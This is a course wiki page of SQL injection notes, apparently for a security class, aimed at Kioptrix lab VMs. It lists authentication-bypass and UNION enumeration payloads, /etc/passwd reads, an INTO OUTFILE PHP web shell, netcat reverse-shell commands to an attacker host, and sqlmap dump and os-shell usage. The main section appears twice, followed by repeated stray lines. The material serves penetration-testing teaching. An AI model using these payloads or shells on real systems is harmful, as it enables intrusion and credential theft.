SQL Injection - Paiet/SEC-335 GitHub Wiki

SQL-Injection (Example VMs: Kioptrix 1.1, 1.2, 1.3)

SQL-Injection in the art of executing arbitrary SQL commands through input of a vulnerable system
- Web site asks you for input
- That input becomes part of a SQL statement
  - Problem comes from no input validation or boundary checks
  - This allows you to add arbitrary SQL commands as part of your input
    - This could be through different means
      - Input boxes
        
        username/password
        
        input fields
      - Directly in the URL
- DEMO
  - kioptrix 1.1
    - Username: ' OR 1=1 #
    - Command injection: 127.0.0.1;cat /etc/passwd
  - kioptrix 1.3
    - Found 2 users using dirb
      - dirb http://kioptrix1-3.com /usr/share/wordlists/dirb/big.txt
        
        /john
        
        /robert
    - Password: ' OR 1=1 #
- Error-Based
  - Website returns SQL error messages
  - Attacker uses that information to craft useful SQL injections
    - SQL Cheat Sheets
      - https://www.exploit-db.com/papers/13650
      - http://pentestmonkey.net/category/cheat-sheet/sql-injection
  - Is this server vulnerable?
    - URL
      - http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos
        
        id=1 may indicate vulnerability
  - Test server for unsanitized input
    - Add single or double quote to end of URL
      - id=1'
      - This is technically a SQL injection
    - Hopefully this produces an error message
      - If YES, then proceed with column enumeration
      - If NO, then site may not be susceptible
        
        Still try Blind SQL-Injection
    - Column Enumeration
      - We want to discover the areas in the web page that we can use to display table and column data
      - We do this by discovering the EXACT number of columns being used
      - Enter the order by statement
        
        http://kioptrix3.com/gallery/gallery.php?id=1 order by 1
        
        Continually increase the order by number until you get an error
        
        There are exactly "error-number minus 1" columns
        
        If no errors are being produced
        
        Try order by 1 --
        
        Then increase number until error or change occurs
      - Enter the union all select statement
        
        http://kioptrix3.com/gallery/gallery.php?id=1 union all select 1,2,3,4,5,6
        
        Helps us find which columns will display DB info on the page
        
        Look for numbers 1 through 6 somewhere on the web page
        
        Here we see that numbers 2 and 3 are visible
        
        So we will use those columns to output DB info
        
        union all select 1,@@version,user(),4,5,6
        
        Displays DB version and user info
        
        Table Enumeration
        
        union all select 1,table_name,3,4,5,6 from information_schema.tables
        
        Column Enumeration
        
        /gallery/gallery.php?id=1 union all select 1,column_name,3,4,5,6 from information_schema.columns where table_name='dev_accounts'
        
        Read Column Info
        
        union all select 1,username,password,4,5,6 from dev_accounts
        
        We now see the usernames and passwords
- Blind SQL Injection
  - Not all injectable web sites return errors (most don't)
  - So we throw some injection attacks at it and see if we get any results
    - Try a GOOD statement like
      - and 1=1;#
    - Try a BAD statement like
      - and 1=2;#
    - Look for ANY change in the site's appearance
      - Changes are an indication of successful injections
    - If this doesn't work then...
      - sleep()
        
        http://kioptrix3.com/gallery/gallery.php?id=1-sleep(5)
      - If the site "hangs" then the -sleep() injection worked
        
        We can use that as "WORKED/FAILED" indicator
        
        Any good statement will hang the site for 5 seconds
        
        Any bad statement will not hang the site
- Read/Write/Code Execution
  - Read a local file with load_file("/path/to/file")
    - union all select 1,load_file("/etc/passwd"),3,4,5,6
Write a local file with into OUTFILE '/path/to/file'
```
    ```
    union all select 1,"<?php echo shell_exec($_GET['command']);?",3,4,5,6
    into OUTFILE '/tmp/backdoor.php'

    ```

    -   You will want to write exploit code to the web site's directory so that you can browse to that exploit page and run the code
-   Execute Code
    -   Browse to the exploit page and define the command parameter
        -   http://kioptrix3.com/backdoor.php?cmd=nc -nv attacker-ip port -e /bin/bash
        -   http://kioptrix3.com/backdoor.php?cmd=nc -nv.exe attacker-ip port -e cmd.exe
```
- sqlmap
  - Automate all this using sqlmap
    - sqlmap -u http://kioptrix3.com --crawl=1
      - Searches for SQL injection points
      - Injection points displayed in PAYLOAD area
    - sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 --dbms=mysql --dump --threads=5
      - (injection point) --dbms (force db type) --threads (max number of HTTP requests)
        
        Dumps table entries
    - sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 --dbmsmysql --os-shell
      - --os-shell (attempts to obtain remote shell from target)
        
        From here you just issue commands
        
        ifconfig
        
        nc -nv attacker-ip port
Blind SQL Injection
- Not all injectable web sites return errors (most don't)
- So we throw some injection attacks at it and see if we get any results
  - Try a GOOD statement like
    - and 1=1;#
  - Try a BAD statement like
    - and 1=2;#
  - Look for ANY change in the site's appearance
    - Changes are an indication of successful injections
  - If this doesn't work then...
    - sleep()
      - http://kioptrix-3.com/gallery/gallery.php?id=1-sleep(5)
    - If the site "hangs" then the -sleep() injection worked
      - We can use that as "WORKED/FAILED" indicator
      - Any good statement will hang the site for 5 seconds
      - Any bad statement will not hang the site
Read/Write/Code Execution
- Read a local file with load_file("/path/to/file")
  - union all select 1,load_file("/etc/passwd"),3,4,5,6
- Write a local file with into OUTFILE '/path/to/file'
```
union all select 1,"<?php echo shell_exec($_GET['command']);?",3,4,5,6
into OUTFILE '/tmp/backdoor.php' --
```
  - You will want to write exploit code to the web site's directory so that you can browse to that exploit page and run the code
- Execute Code
  - Browse to the exploit page and define the command parameter
    - http://kioptrix-3.com/backdoor.php?cmd=nc -nv attacker-ip port -e /bin/bash
    - http://kioptrix-3.com/backdoor.php?cmd=nc -nv attacker-ip port -e cmd.exe
sqlmap
- Automate all this using sqlmap
  - sqlmap -u http://kioptrix-3.com --crawl=1
    - Searches for SQL injection points
    - Injection points displayed in PAYLOAD area
  - sqlmap -u http://kioptrix-3.com/gallery/gallery.php?id=1 --dbms=mysql --dump --threads=5
    - (injection point) --dbms (force db type) --threads (max number of HTTP requests)
      - Dumps table entries
  - sqlmap -u http://kioptrix-3.com/gallery/gallery.php?id=1 --dbmsmysql --os-shell
    - --os-shell (attempts to obtain remote shell from target)
      - From here you just issue commands
        
        ifconfig
        
        nc -nv attacker-ip port

SQL Injection - Paiet/SEC-335 GitHub Wiki

Write a local file with `into OUTFILE '/path/to/file'`

Write a local file with `into OUTFILE '/path/to/file'`

SQL Injection - Paiet/SEC-335 GitHub Wiki

Write a local file with into OUTFILE '/path/to/file'

Write a local file with into OUTFILE '/path/to/file'

Write a local file with `into OUTFILE '/path/to/file'`

Write a local file with `into OUTFILE '/path/to/file'`